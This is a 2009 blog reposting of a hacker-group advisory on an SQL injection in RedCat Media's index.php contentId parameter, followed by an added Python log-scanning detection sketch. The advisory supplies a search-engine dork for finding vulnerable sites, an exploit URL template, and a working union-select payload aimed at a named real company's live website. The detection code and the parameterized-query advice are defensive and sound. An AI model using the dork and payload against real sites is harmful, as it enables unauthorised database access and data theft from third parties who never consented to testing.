Sunday, October 4, 2009

Redcat Media SQL Injection Vulnerability

[x]==========================================[x]
| AntiSecurity[dot]org |
[x]==========================================[x]
[x]==========================================[x]

| Title : redcat media (inurl:index.php?contentId=) SQL Injection Vulnerability
| Vendor : http://www.redcatmedia.co.uk/
| Date : 2 October 2009 (Indonesia)
| Author : s4va
| Contact : sava_sword@yahoo.com
| Blog : http://s4vaworld.uni.cc

[x]==========================================[x]

| Dork : “Powered by RedCat” inurl:index.php?contentId=

[x]==========================================[x]

| Exploit
| http://target/index.php?contentId=[sql]

[x]==========================================[x]

| Proof of concept
|
http://www.5ringstelecom.com/index.php?contentId=-26%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17–

[x]==========================================[x]

| THX TO:
| blackstar ; x-shadow ; cr4wl3r ; bl4ck_3n91n3 ; k0il ; inc0mp13te ; [...]
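
Detection sketch for the issue described above, added as an example (not part of the original advisory and not vendor code): it scans web server access logs for index.php requests whose contentId is not a plain integer. It assumes combined-format logs and that legitimate contentId values are short positive integers; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Allowlist (assumption): a legitimate contentId is a short positive integer.
VALID_ID_RE = re.compile(r"[0-9]{1,10}")

def check_content_id(raw_value):
    """Return True if the decoded contentId value is a plain integer."""
    return VALID_ID_RE.fullmatch(raw_value) is not None

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_value) for index.php hits failing the allowlist."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs percent-decodes, so %20union%20select is compared as text.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("contentId", []):
            if not check_content_id(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges, no real host).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Oct/2009:10:00:01 +0000] '
    '"GET /index.php?contentId=26 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Oct/2009:10:00:05 +0000] '
    '"GET /index.php?contentId=-26%20union%20select%201,version%28%29,3 HTTP/1.1" 200 4987',
    '192.0.2.10 - - [04/Oct/2009:10:00:09 +0000] '
    '"GET /about.php?contentId=x HTTP/1.1" 200 900',
    '203.0.113.4 - - [04/Oct/2009:10:00:12 +0000] '
    '"GET /index.php?contentId=26%27 HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\tcontentId={value!r}")
```

The same allowlist check belongs in the application itself, before contentId reaches the database, alongside a parameterized query.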
